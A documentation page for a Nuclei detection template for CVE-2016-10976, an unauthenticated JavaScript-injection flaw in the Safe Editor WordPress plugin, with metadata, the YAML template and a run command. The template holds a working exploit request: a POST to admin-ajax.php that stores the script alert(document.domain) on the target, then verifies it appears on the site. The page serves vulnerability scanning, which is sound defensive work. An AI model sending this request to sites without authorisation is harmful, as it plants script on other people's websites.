Skip to content
Nuclei Templates

Safe Editor Plugin < 1.2 - CSS/JS-injection

ID: CVE-2016-10976

Severity: medium

Author: Splint3r7

Tags: cve,cve2016,wordpress,wp,wp-plugin,xss,safe_editor

Description

Section titled “Description”

The safe-editor plugin before 1.2 for WordPress has no se_save authentication, with resultant XSS.

YAML Source

Section titled “YAML Source”
id: CVE-2016-10976


info:
  name: Safe Editor Plugin < 1.2 - CSS/JS-injection
  author: Splint3r7
  severity: medium
  description: |
    The safe-editor plugin before 1.2 for WordPress has no se_save authentication, with resultant XSS.
  remediation: |
    Update to the latest version of safe-editor plugin or apply the patch provided by the vendor.
  reference:
    - https://wordpress.org/plugins/safe-editor/#developers
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10976
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-10976
    cwe-id: CWE-79
    epss-score: 0.00096
    epss-percentile: 0.41555
    cpe: cpe:2.3:a:kodebyraaet:safe_editor:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: kodebyraaet
    product: safe_editor
    framework: wordpress
  tags: cve,cve2016,wordpress,wp,wp-plugin,xss,safe_editor


flow: http(1) && http(2)


http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8


        action=se_save&type=js&data=alert(document.domain)


    matchers:
      - type: dsl
        dsl:
          - 'len(body) == 0'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true


  - method: GET
    path:
      - "{{BaseURL}}"


    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "alert(document.domain)", "save_edit_js")'
        condition: and
# digest: 4a0a0047304502200a5b2427640505cc9cd936660310eb64e0d3eec9d788b20436056a3af0a1df48022100d5b8fe619048e4d6517c5e1656c534db57d243cacc80535f283e3865eee66fd3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-10976.yaml"

View on Github